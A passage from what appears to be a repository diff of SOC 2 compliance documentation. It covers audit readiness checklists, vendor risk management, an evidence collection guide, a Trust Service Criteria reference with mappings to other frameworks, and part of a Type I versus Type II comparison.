2. **Control dashboards** — real-time visibility into control status
3. **Alert-based monitoring** — notify when a control drifts out of compliance
4. **Evidence repository** — centralized, timestamped evidence storage
---
## Audit Readiness Checklist
### Pre-Audit Preparation (4-6 Weeks Before)
- [ ] All controls documented with descriptions, owners, and frequencies
- [ ] Evidence collected for the entire observation period (Type II)
- [ ] Control matrix reviewed and gaps remediated
- [ ] Policies signed and distributed within the last 12 months
- [ ] Access reviews completed within the required frequency
- [ ] Vulnerability scans current (no critical/high unpatched > SLA)
- [ ] Incident response plan tested within the last 12 months
- [ ] Vendor risk assessments current for all subservice organizations
- [ ] DR/BCP tested and documented within the last 12 months
- [ ] Employee security training completed for all staff
### Readiness Scoring
| Score | Rating | Meaning |
|-------|--------|---------|
| 90-100% | Audit Ready | Proceed with confidence |
| 75-89% | Minor Gaps | Address before scheduling audit |
| 50-74% | Significant Gaps | Remediation required |
| < 50% | Not Ready | Major program build-out needed |
### Common Audit Findings
| Finding | Root Cause | Prevention |
|---------|-----------|-----------|
| Incomplete access reviews | Manual process, no reminders | Automate quarterly review triggers |
| Missing change approvals | Emergency changes bypass process | Define emergency change procedure with post-hoc approval |
| Stale vulnerability scans | Scanner misconfigured | Automated weekly scans with alerting |
| Policy not acknowledged | No tracking mechanism | Annual e-signature workflow |
| Missing vendor assessments | No vendor inventory | Maintain vendor register with review schedule |
---
## Vendor Management
### Third-Party Risk Assessment
Every vendor that accesses, stores, or processes customer data must be assessed:
1. **Vendor inventory** — maintain a register of all service providers
2. **Risk classification** — categorize vendors by data access level
3. **Due diligence** — collect SOC 2 reports, security questionnaires, certifications
4. **Contractual protections** — ensure DPAs, security requirements, breach notification clauses
5. **Ongoing monitoring** — annual reassessment, continuous news monitoring
### Vendor Risk Tiers
| Tier | Data Access | Assessment Frequency | Requirements |
|------|-------------|---------------------|-------------|
| Critical | Processes/stores customer data | Annual + continuous monitoring | SOC 2 Type II, penetration test, security review |
| High | Accesses customer environment | Annual | SOC 2 Type II or equivalent, questionnaire |
| Medium | Indirect access, support tools | Annual questionnaire | Security certifications, questionnaire |
| Low | No data access | Biennial questionnaire | Basic security questionnaire |
### Subservice Organizations
When your SOC 2 report relies on controls at a subservice organization (e.g., AWS, GCP, Azure):
- **Inclusive method** — your report covers the subservice org's controls (requires their cooperation)
- **Carve-out method** — your report excludes their controls but references their SOC 2 report
- Most companies use **carve-out** and include complementary user entity controls (CUECs)
---
## Continuous Compliance
### From Point-in-Time to Continuous
| Aspect | Point-in-Time | Continuous |
|--------|---------------|-----------|
| Evidence collection | Manual, before audit | Automated, ongoing |
| Control monitoring | Periodic review | Real-time dashboards |
| Drift detection | Found during audit | Alert-based, immediate |
| Remediation | Reactive | Proactive |
| Audit preparation | 4-8 week scramble | Always ready |
### Implementation Steps
1. **Automate evidence gathering** — cron jobs, API integrations, IaC snapshots
2. **Build control dashboards** — aggregate control status into a single view
3. **Configure drift alerts** — notify when controls fall out of compliance
4. **Establish review cadence** — weekly control owner check-ins, monthly steering
5. **Maintain evidence repository** — centralized, timestamped, auditor-accessible
### Annual Re-Assessment Cycle
| Quarter | Activities |
|---------|-----------|
| Q1 | Annual risk assessment, policy refresh, vendor reassessment launch |
| Q2 | Internal control testing, remediation of findings |
| Q3 | Pre-audit readiness review, evidence completeness check |
| Q4 | External audit, management assertion, report distribution |
---
## Anti-Patterns
| Anti-Pattern | Why It Fails | Better Approach |
|--------------|-------------|----------------|
| Point-in-time compliance | Controls degrade between audits; gaps found during audit | Implement continuous monitoring and automated evidence |
| Manual evidence collection | Time-consuming, inconsistent, error-prone | Automate with scripts, IaC, and compliance platforms |
| Missing vendor assessments | Auditors flag incomplete vendor due diligence | Maintain vendor register with risk-tiered assessment schedule |
| Copy-paste policies | Generic policies don't match actual operations | Tailor policies to your actual environment and technology stack |
| Security theater | Controls exist on paper but aren't followed | Verify operating effectiveness; build controls into workflows |
| Skipping Type I | Jumping to Type II without foundational readiness | Start with Type I to validate control design before observation |
| Over-scoping TSC | Including all 5 categories when only Security is needed | Select categories based on actual customer/business requirements |
| Treating audit as a project | Compliance degrades after the report is issued | Build compliance into daily operations and engineering culture |
---
## Tools
### Control Matrix Builder
Generates a SOC 2 control matrix from selected TSC categories.
```bash
# Generate full security matrix in markdown
python scripts/control_matrix_builder.py --categories security --format md
# Generate matrix for multiple categories as JSON
python scripts/control_matrix_builder.py --categories security,availability,confidentiality --format json
# All categories, CSV output
python scripts/control_matrix_builder.py --categories security,availability,confidentiality,processing-integrity,privacy --format csv
```
### Evidence Tracker
Tracks evidence collection status per control.
```bash
# Check evidence status from a control matrix
python scripts/evidence_tracker.py --matrix controls.json --status
# JSON output for integration
python scripts/evidence_tracker.py --matrix controls.json --status --json
```
### Gap Analyzer
Analyzes current controls against SOC 2 requirements and identifies gaps.
```bash
# Type I gap analysis
python scripts/gap_analyzer.py --controls current_controls.json --type type1
# Type II gap analysis (includes operating effectiveness)
python scripts/gap_analyzer.py --controls current_controls.json --type type2 --json
```
---
## References
- [Trust Service Criteria Reference](references/trust_service_criteria.md) — All 5 TSC categories with sub-criteria, control objectives, and evidence examples
- [Evidence Collection Guide](references/evidence_collection_guide.md) — Evidence types per control, automation tools, documentation requirements
- [Type I vs Type II Comparison](references/type1_vs_type2.md) — Detailed comparison, timeline, cost analysis, and upgrade path
---
## Cross-References
- **[gdpr-dsgvo-expert](../gdpr-dsgvo-expert/SKILL.md)** — SOC 2 Privacy criteria overlaps significantly with GDPR requirements; use together when processing EU personal data
- **[information-security-manager-iso27001](../information-security-manager-iso27001/SKILL.md)** — ISO 27001 Annex A controls map closely to SOC 2 Security criteria; organizations pursuing both can share evidence
- **[isms-audit-expert](../isms-audit-expert/SKILL.md)** — Audit methodology and finding management patterns transfer directly to SOC 2 audit preparation

View File

@@ -0,0 +1,227 @@
# SOC 2 Evidence Collection Guide
Practical guide for collecting, organizing, and maintaining audit evidence for SOC 2 Type I and Type II engagements. Covers evidence types, automation strategies, and documentation requirements.
---
## Evidence Fundamentals
### What Auditors Look For
1. **Existence** — The control is documented and exists
2. **Design effectiveness** — The control is designed to address the TSC criterion (Type I + Type II)
3. **Operating effectiveness** — The control operates consistently over the observation period (Type II only)
### Evidence Quality Criteria
| Criterion | Description |
|-----------|-------------|
| **Relevant** | Directly demonstrates the control's operation |
| **Reliable** | Generated by systems or independent parties (not self-reported) |
| **Timely** | Falls within the audit/observation period |
| **Sufficient** | Enough samples to demonstrate consistency |
| **Complete** | Covers the full population or a representative sample |
### Evidence Types
| Type | Description | Examples |
|------|-------------|---------|
| **Inquiry** | Verbal or written descriptions from personnel | Interview notes, written responses |
| **Observation** | Auditor witnesses control in operation | Process walkthroughs, live demonstrations |
| **Inspection** | Review of documents, records, or configurations | Policy documents, system screenshots, logs |
| **Re-performance** | Auditor re-executes the control to verify results | Access review validation, configuration checks |
---
## Evidence by Control Area
### Access Management
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Access provisioning | Provisioning policy, role matrix | Sample provisioning tickets with approvals (full period) |
| Access removal | Termination checklist, deprovisioning SOP | Sample termination events with access removal timestamps |
| Access reviews | Review policy, review template | Completed quarterly access review reports with sign-offs |
| MFA enforcement | MFA policy, configuration screenshot | MFA enrollment report showing 100% coverage |
| Privileged access | Privileged access policy, admin list | Quarterly privileged access reviews, admin activity logs |
### Change Management
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Change authorization | Change management policy, workflow description | Sample change tickets with approvals, peer reviews |
| Testing requirements | Testing policy, test plan template | Test results for sampled changes, QA sign-offs |
| Emergency changes | Emergency change procedure | Emergency change tickets with post-hoc approvals |
| Deployment process | CI/CD documentation, deployment runbook | Deployment logs, rollback records |
| Code review | Code review policy | Pull request histories showing reviewer approvals |
### Incident Response
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| IR plan | Incident response plan document | Plan review/update records, version history |
| IR testing | Tabletop exercise schedule | Tabletop exercise reports, lessons learned |
| Incident handling | Triage procedures, classification criteria | Incident tickets with timestamps, escalation records |
| Postmortems | Postmortem template, review process | Completed postmortem documents, follow-up actions |
| Communication | Communication plan, stakeholder list | Notification records, status page updates |
### Vulnerability Management
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Scanning | Scanning schedule, tool configuration | Scan reports covering the full period (weekly/monthly) |
| Remediation SLAs | Remediation policy with SLA definitions | Remediation tracking showing SLA compliance rates |
| Patch management | Patching policy, schedule | Patch records, before/after scan comparisons |
| Penetration testing | Pentest policy, scope definition | Pentest reports (annual), remediation records |
### Encryption and Data Protection
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Encryption at rest | Encryption policy, configuration docs | Configuration screenshots, encryption audit reports |
| Encryption in transit | TLS policy, minimum version requirements | TLS scan results, certificate inventory |
| Key management | Key management policy, rotation schedule | Key rotation logs, access records for key stores |
| DLP | DLP policy, tool configuration | DLP alert logs, incident records, exception approvals |
### Backup and Recovery
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Backup procedures | Backup policy, schedule, retention rules | Backup success/failure logs (daily), retention compliance |
| DR planning | DR plan, recovery procedures | DR plan review records, update history |
| DR testing | DR test schedule, test plan | DR test reports with RTO/RPO measurements |
| BCP | BCP document, communication tree | BCP review records, test results |
### Monitoring and Logging
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| SIEM/logging | Logging policy, SIEM configuration | Log retention evidence, alert samples, dashboard screenshots |
| Alert management | Alert rules, escalation procedures | Alert trigger samples, response records |
| Uptime monitoring | Monitoring tool configuration, SLA definitions | Uptime reports covering the full period |
| Anomaly detection | Detection rules, baseline configuration | Detection events, investigation records |
### Policy and Governance
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Security policies | Policy library, version control | Policy acknowledgment records, annual review evidence |
| Security training | Training program description, content | Training completion records (all employees) |
| Risk assessment | Risk assessment methodology | Annual risk assessment report, risk register updates |
| Board oversight | Committee charter, reporting schedule | Board meeting minutes, security reports to leadership |
### Vendor Management
| Control | Type I Evidence | Type II Evidence |
|---------|----------------|-----------------|
| Vendor inventory | Vendor register, classification criteria | Current vendor register with risk tiers |
| Vendor assessment | Assessment questionnaire, criteria | Completed assessments, vendor SOC reports collected |
| Contractual controls | DPA template, security requirements | Signed DPAs, contract review records |
| Ongoing monitoring | Monitoring schedule, reassessment triggers | Reassessment records, monitoring reports |
---
## Evidence Automation
### Automated Evidence Sources
| Evidence | Automation Approach | Tools |
|----------|-------------------|-------|
| Access reviews | Scheduled IAM exports, automated review workflows | Okta, Azure AD, AWS IAM + Jira/ServiceNow |
| Configuration compliance | Infrastructure-as-code, policy-as-code scanning | Terraform, OPA, AWS Config, Azure Policy |
| Vulnerability scans | Scheduled scanning with report auto-generation | Nessus, Qualys, Snyk, Dependabot |
| Change management | Git-based audit trails (commits, PRs, approvals) | GitHub, GitLab, Bitbucket |
| Uptime monitoring | Continuous synthetic monitoring with SLA dashboards | Datadog, New Relic, PagerDuty, Pingdom |
| Backup verification | Automated backup validation and restore tests | AWS Backup, Veeam, custom scripts |
| Training completion | LMS with automated tracking and reminders | KnowBe4, Curricula, custom LMS |
| Policy acknowledgment | Digital signature workflows with tracking | DocuSign, HelloSign, internal tools |
### Evidence Collection Script Pattern
```
1. Define evidence requirements per control
2. Map each requirement to a data source (API, log, screenshot)
3. Schedule automated collection (daily/weekly/monthly)
4. Store evidence with timestamps in a central repository
5. Generate collection status dashboard
6. Alert on missing or overdue evidence
```
### Evidence Repository Structure
```
evidence/
├── {year}-{audit-period}/
│ ├── access-management/
│ │ ├── quarterly-access-review-Q1.pdf
│ │ ├── quarterly-access-review-Q2.pdf
│ │ ├── mfa-enrollment-report-2025-03.png
│ │ └── provisioning-samples/
│ ├── change-management/
│ │ ├── change-ticket-samples/
│ │ └── deployment-logs/
│ ├── incident-response/
│ │ ├── ir-plan-v3.2.pdf
│ │ ├── tabletop-exercise-2025-06.pdf
│ │ └── incident-tickets/
│ ├── vulnerability-management/
│ │ ├── scan-reports/
│ │ └── pentest-report-2025.pdf
│ ├── policies/
│ │ ├── information-security-policy-v4.pdf
│ │ └── acknowledgment-records/
│ └── vendor-management/
│ ├── vendor-register.csv
│ └── vendor-assessments/
```
---
## Sampling Methodology
Auditors use sampling to test operating effectiveness. Understanding the methodology helps you prepare the right volume of evidence.
### Sample Sizes by Control Frequency
| Control Frequency | Population Size (per period) | Typical Sample Size |
|-------------------|------------------------------|-------------------|
| Annual | 1 | 1 (all items) |
| Quarterly | 4 | 2-4 |
| Monthly | 6-12 | 2-5 |
| Weekly | 26-52 | 5-15 |
| Daily | 180-365 | 20-40 |
| Continuous/per-event | Varies | 25-60 |
### Key Sampling Rules
1. **Higher frequency = larger sample** — more occurrences mean more samples needed
2. **Automated controls** — typically only 1 sample needed if the system is validated
3. **Exceptions must be explained** — any deviation in a sample requires documentation
4. **Population completeness** — you must provide the full population for the auditor to select from
---
## Type I vs Type II Evidence Differences
| Aspect | Type I | Type II |
|--------|--------|---------|
| **Time scope** | Single point in time | Entire observation period (3-12 months) |
| **Volume** | Lower — policies and configurations | Higher — ongoing logs, tickets, reports |
| **Focus** | "Is the control designed properly?" | "Did the control operate effectively?" |
| **Exceptions** | N/A | Must document and explain every exception |
| **Owner sign-off** | Policy approval records | Ongoing review sign-offs throughout the period |
---
## Common Evidence Pitfalls
| Pitfall | Impact | Prevention |
|---------|--------|-----------|
| Screenshots without timestamps | Auditor cannot verify timing | Always include system clock or date stamps |
| Policies without version control | Cannot prove current vs outdated | Use document management with version tracking |
| Access reviews without sign-off | Cannot prove review was completed | Require digital approval/sign-off on every review |
| Gaps in monitoring data | Suggests control was not operating | Ensure logging continuity; document any outages |
| Evidence from wrong period | Does not cover the observation window | Verify date ranges before submission |
| Redacted evidence without explanation | Auditor may question completeness | Provide redaction rationale and methodology |
| Self-generated evidence only | Lower reliability in auditor's assessment | Include system-generated and third-party evidence |
| Missing exception documentation | Auditor flags as control failure | Document every exception with root cause and remediation |

View File

@@ -0,0 +1,273 @@
# SOC 2 Trust Service Criteria Reference
Comprehensive reference for all five AICPA Trust Service Criteria (TSC) categories. Each criterion includes its objective, sub-criteria, typical controls, and evidence examples.
---
## 1. Security (Common Criteria) — Required
The Security category is mandatory for every SOC 2 engagement. It maps to the 17 COSO 2013 internal control principles organized into nine groups (CC1-CC9).
### CC1 — Control Environment
Establishes the foundation for all other components of internal control.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC1.1 | Demonstrate commitment to integrity and ethical values | Code of conduct, ethics hotline, background checks | Signed code of conduct, hotline reports, screening records |
| CC1.2 | Board exercises oversight of internal control | Independent board/committee, regular reporting | Board meeting minutes, committee charters, oversight reports |
| CC1.3 | Management establishes structure and reporting lines | Organizational charts, role definitions, RACI matrices | Org charts, job descriptions, authority matrices |
| CC1.4 | Commitment to attract, develop, and retain competent individuals | Training programs, competency assessments, career development | Training completion records, skills assessments, HR policies |
| CC1.5 | Hold individuals accountable for internal control responsibilities | Performance evaluations, disciplinary procedures | Performance review records, accountability documentation |
### CC2 — Communication and Information
Ensures relevant, quality information flows internally and externally.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC2.1 | Obtain and generate relevant quality information | Data classification, information quality standards | Classification policy, data quality reports |
| CC2.2 | Internally communicate information and responsibilities | Internal newsletters, policy distribution, security awareness | Communication logs, training materials, acknowledgment records |
| CC2.3 | Communicate with external parties | Customer notifications, vendor communications, incident notices | External communication policy, notification records, status pages |
### CC3 — Risk Assessment
Identifies and assesses risks that may prevent achievement of objectives.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC3.1 | Specify objectives to identify and assess risks | Risk management framework, risk appetite statement | Risk methodology document, risk appetite approval |
| CC3.2 | Identify and analyze risks | Risk assessments, threat modeling, vulnerability analysis | Risk register, threat models, assessment reports |
| CC3.3 | Consider potential for fraud | Fraud risk assessment, segregation of duties | Fraud risk report, SoD matrix, anti-fraud controls |
| CC3.4 | Identify and assess changes impacting internal control | Change impact analysis, environmental scanning | Change assessments, business impact analyses |
### CC4 — Monitoring Activities
Ongoing evaluations to verify internal controls are present and functioning.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC4.1 | Select and perform ongoing and separate evaluations | Continuous monitoring, internal audits, control testing | Monitoring dashboards, audit reports, testing results |
| CC4.2 | Evaluate and communicate deficiencies | Deficiency tracking, remediation management, management reporting | Deficiency logs, remediation plans, management reports |
### CC5 — Control Activities
Policies and procedures that ensure management directives are carried out.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC5.1 | Select and develop control activities that mitigate risks | Risk-based control selection, control design documentation | Control matrix, risk treatment plans |
| CC5.2 | Select and develop technology controls | IT general controls, automated controls, technology governance | ITGC documentation, technology policies, automated control configs |
| CC5.3 | Deploy control activities through policies and procedures | Policy library, procedure documentation, acknowledgment tracking | Policy repository, version history, signed acknowledgments |
### CC6 — Logical and Physical Access Controls
Restrict logical and physical access to information assets.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC6.1 | Logical access security over protected assets | IAM platform, SSO, MFA enforcement | IAM configuration, SSO settings, MFA enrollment reports |
| CC6.2 | Access provisioning based on role and need | Role-based access, provisioning workflows, approval chains | Provisioning tickets, role matrix, approval records |
| CC6.3 | Access removal on termination or role change | Offboarding checklists, automated deprovisioning | Deprovisioning tickets, termination checklists, access removal logs |
| CC6.4 | Periodic access reviews | Quarterly user access reviews, entitlement validation | Access review reports, entitlement listings, sign-off records |
| CC6.5 | Physical access restrictions | Badge systems, visitor management, secure areas | Badge access logs, visitor logs, physical access policies |
| CC6.6 | Encryption of data in transit and at rest | TLS enforcement, disk encryption, key management | TLS configuration, encryption settings, key rotation records |
| CC6.7 | Data transmission and movement restrictions | DLP tools, network segmentation, firewall rules | DLP configuration, network diagrams, firewall rule sets |
| CC6.8 | Prevention/detection of unauthorized software | Endpoint protection, application whitelisting, malware scanning | EDR configuration, whitelist policies, scan reports |
### CC7 — System Operations
Detect and mitigate security events and anomalies.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC7.1 | Vulnerability identification and management | Vulnerability scanning, patch management, remediation SLAs | Scan reports, patch records, SLA compliance metrics |
| CC7.2 | Monitor for anomalies and security events | SIEM, IDS/IPS, behavioral analytics | SIEM dashboards, alert rules, detection logs |
| CC7.3 | Security event evaluation and classification | Incident classification criteria, triage procedures | Classification matrix, triage logs, escalation records |
| CC7.4 | Incident response execution | Incident response plan, response team, communication procedures | IR plan, incident tickets, communication records |
| CC7.5 | Incident recovery and lessons learned | Recovery procedures, post-incident reviews, plan updates | Recovery records, postmortem reports, plan revision history |
### CC8 — Change Management
Authorize, design, develop, test, and implement changes to infrastructure and software.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC8.1 | Change authorization, testing, and approval | Change management process, approval workflows, testing requirements | Change tickets, approval records, test results, deployment logs |
### CC9 — Risk Mitigation
Manage risks associated with business disruption, vendors, and partners.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| CC9.1 | Vendor and business partner risk management | Vendor assessment program, third-party risk management | Vendor risk assessments, vendor register, vendor SOC reports |
| CC9.2 | Risk mitigation through transfer mechanisms | Cyber insurance, contractual protections | Insurance certificates, contract provisions |
---
## 2. Availability (A1) — Optional
Addresses system uptime, performance, and recoverability commitments.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| A1.1 | Capacity and performance management | Auto-scaling, resource monitoring, capacity planning | Capacity dashboards, scaling policies, resource utilization trends |
| A1.2 | Recovery operations | Backup procedures, DR planning, BCP documentation | Backup logs, DR plan, BCP documentation, recovery procedures |
| A1.3 | Recovery testing | DR drills, failover tests, RTO/RPO validation | DR test reports, failover results, RTO/RPO measurements |
### When to Include Availability
- Your customers depend on your service uptime
- You have SLAs with financial penalties for downtime
- Your service is in the critical path of customer operations
- You provide infrastructure or platform services
### Key Metrics
| Metric | Description | Typical Target |
|--------|-------------|----------------|
| RTO | Recovery Time Objective — max acceptable downtime | 1-4 hours |
| RPO | Recovery Point Objective — max acceptable data loss | 1-24 hours |
| SLA | Service Level Agreement — uptime commitment | 99.9%-99.99% |
| MTTR | Mean Time to Recovery — average recovery duration | < 1 hour |
---
## 3. Confidentiality (C1) — Optional
Protects information designated as confidential throughout its lifecycle.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| C1.1 | Identification of confidential information | Data classification scheme, confidential data inventory | Classification policy, data inventory, labeling standards |
| C1.2 | Protection of confidential information | Encryption, access restrictions, DLP, secure transmission | Encryption configs, ACLs, DLP rules, secure transfer logs |
| C1.3 | Disposal of confidential information | Secure deletion, media sanitization, retention enforcement | Disposal procedures, sanitization certificates, deletion logs |
### When to Include Confidentiality
- You handle trade secrets or proprietary business information
- Contracts require confidentiality assurance
- You process data classified above "public" in your classification scheme
- Customers share confidential data for processing
### Data Classification Levels
| Level | Description | Handling Requirements |
|-------|-------------|----------------------|
| Public | No restrictions | No special controls |
| Internal | Business use only | Access controls, basic encryption |
| Confidential | Restricted access | Strong encryption, DLP, access reviews |
| Highly Confidential | Strictly controlled | Strongest encryption, MFA, audit logging, need-to-know |
---
## 4. Processing Integrity (PI1) — Optional
Ensures system processing is complete, valid, accurate, timely, and authorized.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| PI1.1 | Processing accuracy | Input validation, data integrity checks, output verification | Validation rules, integrity check logs, reconciliation reports |
| PI1.2 | Processing completeness | Transaction monitoring, completeness checks, reconciliation | Transaction logs, batch processing reports, reconciliation records |
| PI1.3 | Processing timeliness | SLA monitoring, batch job scheduling, processing alerts | SLA reports, job schedules, processing time metrics |
| PI1.4 | Processing authorization | Authorization controls, segregation of duties, approval workflows | Authorization matrix, SoD analysis, approval records |
### When to Include Processing Integrity
- You perform financial calculations or transactions
- Data accuracy is critical to customer operations
- You provide analytics or reporting that drives business decisions
- Regulatory requirements demand processing accuracy (e.g., healthcare, finance)
### Validation Checkpoints
| Stage | Validation | Method |
|-------|-----------|--------|
| Input | Data format, range, completeness | Automated validation rules |
| Processing | Calculation accuracy, transformation correctness | Unit tests, reconciliation |
| Output | Report accuracy, data completeness | Cross-checks, manual review, checksums |
| Transfer | Transmission integrity, completeness | Hash verification, acknowledgment protocols |
---
## 5. Privacy (P1-P8) — Optional
Governs the collection, use, retention, disclosure, and disposal of personal information. Closely aligns with GDPR, CCPA, and other privacy regulations.
| Criterion | Objective | Typical Controls | Evidence |
|-----------|-----------|-----------------|----------|
| P1.1 | Notice — inform data subjects about data practices | Privacy policy, collection notices, purpose statements | Published privacy policy, collection banners, purpose documentation |
| P2.1 | Choice and consent — provide opt-in/opt-out mechanisms | Consent management, preference centers, granular consent | Consent records, preference logs, opt-out mechanisms |
| P3.1 | Collection — collect only necessary personal information | Data minimization, lawful basis documentation, purpose specification | Collection audits, lawful basis records, data flow diagrams |
| P4.1 | Use, retention, and disposal — limit use and enforce retention | Purpose limitation, retention schedules, automated deletion | Use restriction controls, retention policies, deletion logs |
| P4.2 | Disposal — secure disposal when no longer needed | Secure deletion, media sanitization | Disposal certificates, sanitization records |
| P5.1 | Access — provide data subjects access to their data | DSAR processing, data portability, access portals | DSAR logs, response timelines, export capabilities |
| P5.2 | Correction — allow data subjects to correct their data | Correction request processing, data update mechanisms | Correction logs, update records |
| P6.1 | Disclosure — control third-party data sharing | Data sharing agreements, third-party inventory, DPAs | DPAs, sharing agreements, third-party register |
| P6.2 | Notification — notify of breaches affecting personal data | Breach notification procedures, regulatory reporting | Breach response plan, notification records, reporting logs |
| P7.1 | Quality — maintain accurate personal information | Data quality checks, accuracy verification, correction mechanisms | Quality reports, accuracy audits, correction records |
| P8.1 | Monitoring — monitor privacy program effectiveness | Privacy audits, compliance reviews, complaint tracking | Audit reports, compliance dashboards, complaint logs |
### When to Include Privacy
- You process personal information (PII) of end users or customers
- You operate in jurisdictions with privacy regulations (GDPR, CCPA, LGPD)
- Customers request privacy assurance as part of vendor assessment
- Your service involves health, financial, or other sensitive personal data
### Privacy Criteria Overlap with GDPR
| SOC 2 Privacy | GDPR Article | Alignment |
|---------------|-------------|-----------|
| P1 (Notice) | Art. 13-14 | Direct — transparency requirements |
| P2 (Consent) | Art. 6-7 | Direct — lawful basis and consent |
| P3 (Collection) | Art. 5(1)(b-c) | Direct — purpose limitation, minimization |
| P4 (Retention) | Art. 5(1)(e) | Direct — storage limitation |
| P5 (Access) | Art. 15-16 | Direct — data subject rights |
| P6 (Disclosure) | Art. 33-34 | Direct — breach notification |
| P7 (Quality) | Art. 5(1)(d) | Direct — accuracy principle |
| P8 (Monitoring) | Art. 5(2) | Direct — accountability principle |
---
## TSC Selection Guide
| Question | If Yes, Include |
|----------|----------------|
| Do you store/process customer data? | Security (required) |
| Do customers depend on your uptime? | Availability |
| Do you handle confidential business data? | Confidentiality |
| Is data accuracy critical to your service? | Processing Integrity |
| Do you process personal information? | Privacy |
### Common Combinations
| Company Type | Typical TSC Selection |
|-------------|----------------------|
| SaaS platform | Security + Availability |
| Data analytics | Security + Processing Integrity + Confidentiality |
| Healthcare SaaS | Security + Availability + Privacy + Confidentiality |
| Financial services | Security + Availability + Processing Integrity + Confidentiality |
| Infrastructure/PaaS | Security + Availability |
| HR/Payroll SaaS | Security + Availability + Privacy |
---
## Mapping to Other Frameworks
| SOC 2 Criteria | ISO 27001 | NIST CSF | HIPAA | PCI DSS |
|---------------|-----------|----------|-------|---------|
| CC1 (Control Environment) | A.5 (Policies) | ID.GV | Administrative Safeguards | Req 12 |
| CC2 (Communication) | A.5.1 (Policies) | ID.GV | Administrative Safeguards | Req 12 |
| CC3 (Risk Assessment) | A.8.2 (Risk) | ID.RA | Risk Analysis | Req 12.2 |
| CC4 (Monitoring) | A.8.34 (Monitoring) | DE.CM | Audit Controls | Req 10 |
| CC5 (Control Activities) | A.5-A.8 | PR | All Safeguards | Multiple |
| CC6 (Logical/Physical Access) | A.5.15, A.7 | PR.AC | Access Controls | Req 7-9 |
| CC7 (System Operations) | A.8.8, A.8.15 | DE, RS | Technical Safeguards | Req 5-6, 11 |
| CC8 (Change Management) | A.8.32 | PR.IP | Change Management | Req 6.4 |
| CC9 (Risk Mitigation) | A.5.19-5.22 | ID.SC | Business Associate Agreements | Req 12.8 |
| A1 (Availability) | A.8.13-14 | PR.IP | Contingency Plan | Req 12.10 |
| C1 (Confidentiality) | A.5.13-14, A.8.10-12 | PR.DS | Access Controls | Req 3-4 |
| PI1 (Processing Integrity) | A.8.24-25 | PR.DS | Integrity Controls | Req 6.5 |
| P1-P8 (Privacy) | A.5.34 (Privacy) | PR.PT | Privacy Rule | N/A |

View File

@@ -0,0 +1,273 @@
# SOC 2 Type I vs Type II Comparison
Detailed guide for understanding the differences between SOC 2 Type I and Type II reports, selecting the right starting point, planning timelines, and managing the upgrade path.
---
## Overview
| Dimension | Type I | Type II |
|-----------|--------|---------|
| **Full Name** | SOC 2 Type I Report | SOC 2 Type II Report |
| **What It Tests** | Design of controls at a specific point in time | Design AND operating effectiveness over a period |
| **Observation Period** | None — single date | 3-12 months (6 months typical) |
| **Auditor Opinion** | "Controls are suitably designed as of [date]" | "Controls are suitably designed and operating effectively for the period [start] to [end]" |
| **Evidence Volume** | Lower — policies, configs, descriptions | Higher — ongoing logs, tickets, samples across the period |
| **Timeline to Complete** | 1-3 months (prep + audit) | 6-15 months (prep + observation + audit) |
| **Audit Fee Range** | $20K-$50K | $30K-$100K+ |
| **Internal Cost** | $50K-$150K (implementation + audit) | $100K-$300K+ (implementation + monitoring + audit) |
| **Market Perception** | "They have controls" | "Their controls actually work" |
| **Validity** | Snapshot — stale quickly | Covers a defined period; renewed annually |
---
## When to Start with Type I
Type I is the right starting point when:
1. **First SOC 2 engagement** — You need to validate control design before investing in a full observation period
2. **Rapid market need** — A customer or deal requires SOC 2 assurance within 3 months
3. **Building the program** — Your compliance program is new and you want a structured assessment
4. **Budget constraints** — Type I costs significantly less and helps justify future Type II investment
5. **Control maturity is low** — You are still implementing controls and need a milestone before Type II
### Type I Limitations
- **Short shelf life** — Enterprise customers often ask "When is your Type II coming?"
- **No operating proof** — Does not demonstrate that controls work consistently
- **Annual deals may require Type II** — Many procurement teams mandate Type II for contracts above a threshold
- **Repeated cost** — If you plan to go Type II anyway, Type I is an additional expense
---
## When to Go Directly to Type II
Skip Type I and go directly to Type II when:
1. **Controls are already mature** — You have been operating security controls for 6+ months
2. **Customer requirements** — Your target customers explicitly require Type II
3. **Competitive pressure** — Competitors already have Type II reports
4. **Existing framework** — You already have ISO 27001 or similar, and controls are mapped
5. **Budget allows it** — You can absorb the longer timeline and higher cost
---
## Timeline Comparison
### Type I Timeline (Typical: 3-4 Months)
```
Month 1-2: Gap Assessment + Remediation
├── Assess current controls against TSC
├── Implement missing controls
├── Document policies and procedures
└── Assign control owners
Month 3: Audit Execution
├── Auditor reviews control descriptions
├── Auditor inspects configurations and policies
├── Management provides representation letter
└── Report issued
```
### Type II Timeline (Typical: 9-15 Months)
```
Month 1-3: Gap Assessment + Remediation
├── Assess current controls against TSC
├── Implement missing controls
├── Document policies and procedures
├── Set up evidence collection processes
└── Assign control owners
Month 4-9: Observation Period (6 months minimum)
├── Controls operate normally
├── Evidence is collected continuously
├── Periodic internal reviews
├── Address any control failures
└── Maintain documentation
Month 10-12: Audit Execution
├── Auditor tests operating effectiveness
├── Auditor samples evidence across the period
├── Exceptions documented and evaluated
